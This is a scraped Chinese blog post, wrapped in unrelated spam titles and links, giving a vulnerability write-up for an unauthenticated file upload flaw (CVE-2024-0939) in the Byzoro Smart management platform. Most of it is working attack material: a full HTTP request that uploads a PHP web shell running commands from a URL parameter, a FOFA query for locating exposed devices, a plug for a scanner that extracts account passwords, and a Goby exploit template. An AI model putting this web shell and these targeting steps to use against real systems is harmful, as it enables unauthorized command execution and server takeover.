当前位置: 首页 > news >正文

百度做网站电话多少钱图书网站开发需求文档模板

百度做网站电话多少钱,图书网站开发需求文档模板,什么做网站推广,网站建设驻地开发合同百卓Smart管理平台 uploadfile.php 文件上传漏洞【CVE-2024-0939】 一、 产品简介二、 漏洞概述三、 影响范围四、 复现环境五、 漏洞复现手动复现小龙验证Goby验证 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工… 百卓Smart管理平台 uploadfile.php 文件上传漏洞【CVE-2024-0939】 一、 产品简介二、 漏洞概述三、 影响范围四、 复现环境五、 漏洞复现手动复现小龙验证Goby验证 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、 产品简介 百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品是一家致力于构建下一代安全互联网的高科技企业。 二、 漏洞概述 百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件执行任意指令从而获得服务器权限并操纵服务器文件。 三、 影响范围 smart s210 smart s210 firmware 四、 复现环境 FOFA:title“Smart管理平台” 五、 漏洞复现 poc POST /Tool/uploadfile.php? HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary---------------------------13979701222747646634037182887 Upgrade-Insecure-Requests: 1 Connection: close-----------------------------13979701222747646634037182887 Content-Disposition: form-data; namefile_upload; filename1.php Content-Type: application/octet-stream?php system($_GET[c]);? -----------------------------13979701222747646634037182887 Content-Disposition: form-data; nametxt_path/home/rce.php -----------------------------13979701222747646634037182887--手动复现 验证 小龙验证 当然如果你已经厌倦了手工 可以用小龙的POC自动检测并且提取账号密码 小龙POC这里依然还是顶着干 小龙POC开源传送门: 小龙POC工具 小龙POCexe传送门: 小龙POC工具 发现漏洞很多啊扫3个出来三个 Goby验证 我们不妨编写一个goby的yaml文件来进行验证 poc package exploitsimport (git.gobies.org/goby/goscanner/goutils )func init() {expJson : {Name: 百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939),Description: ,Product: ,Homepage: ,DisclosureDate: 2024-02-07,PostTime: 2024-02-07,Author: 597146595qq.com,FofaQuery: port\8443\,GobyQuery: port\8443\,Level: 3,Impact: ,Recommendation: ,References: [],Is0day: false,HasExp: false,ExpParams: [],ExpTips: {Type: ,Content: },ScanSteps: [AND,{Request: {method: POST,uri: /Tool/uploadfile.php,follow_redirect: true,header: {User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36,Accept-Encoding: gzip, deflate,Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8,Connection: close,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2,Content-Type: multipart/form-data; boundary---------------------------13979701222747646634037182887,Upgrade-Insecure-Requests: 1},data_type: text,data: -----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name\file_upload\; filename\1.php\\nContent-Type: application/octet-stream\n\n?php system($_GET[\c\]);?\n-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name\txt_path\\n\n/home/rce.php\n-----------------------------13979701222747646634037182887--},ResponseTest: {type: group,operation: AND,checks: [{type: item,variable: $code,operation: ,value: 200,bz: },{type: item,variable: $body,operation: contains,value: uploadfile,bz: }]},SetVariable: []}],ExploitSteps: [AND,{Request: {method: GET,uri: /test.php,follow_redirect: true,header: {},data_type: text,data: },ResponseTest: {type: group,operation: AND,checks: [{type: item,variable: $code,operation: ,value: 200,bz: },{type: item,variable: $body,operation: contains,value: test,bz: }]},SetVariable: []}],Tags: [],VulType: [],CVEIDs: [],CNNVD: [],CNVD: [],CVSSScore: ,Translation: {CN: {Name: 百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939),Product: ,Description: ,Recommendation: ,Impact: ,VulType: [],Tags: []},EN: {Name: Byzoro Smart Management Platform Upload Vulnerability CVE-2024-0939,Product: ,Description: ,Recommendation: ,Impact: ,VulType: [],Tags: []}},AttackSurfaces: {Application: null,Support: null,Service: null,System: null,Hardware: null} }ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,nil,nil,)) }测试效果如图
http://www.zqtcl.cn/news/344975/

相关文章:

  • 营销型网站建设的优缺点利用海康威视做直播网站
  • 阿里手机网站开发框架怎么看网站被降权
  • 电视台做网站还是APP网络推广是什么意思
  • 浙江鼎兴建设有限公司网站wordpress看不到安装的主题
  • 琪觅公司网站开发c语言开发环境
  • 在哪个网站上做实验仪器比较好信息服务平台有哪些
  • 淘宝网站的建设目的是什么意思做雕塑设计的网站
  • 猎头网站模板个人社保缴费年限怎么查询
  • 博客网站设计及说明wordpress 显示 列表
  • 佛山制作手机网站莆田自助建站软件
  • 建邺做网站价格网站做换肤
  • 佛山有什么网站室内装饰设计怎么样
  • 智能建站与正常的网站购买 做网站 客户
  • 哪个是网络营销导向网站建设的基础微信商城开店需要费用吗
  • 宁波住房和建设局网站首页福州有做网站引流的吗
  • 国外科技类网站戴尔网站建设
  • 视频播放网站模板洞泾做网站公司
  • 深圳大学网站建设中美军事最新消息
  • gta5可用手机网站大全佛山网站建设服务
  • 智能建站软件哪个好智慧城市建设评价网站
  • 做网站用什么配资电脑织梦做的网站织梦修改网页模板
  • 手机网站制作吧网店营销策略
  • 管理员修改网站的参数会对网站的搜效果产生什么影响?网站建设新闻+常识
  • WordPress主题没有删除网站优化 工具
  • 建设外贸商城网站制作外国网站域名在哪查
  • 青浦练塘网站建设关键词优化的策略有哪些
  • 做网站链接怎么弄上海万户网络技术有限公司
  • 嵌入字体的网站网站结构和布局区别
  • 莆田网站建设五维网络有限公司零基础网站开发要学多久
  • 重庆官方网站查询系统2020最近的新闻大事10条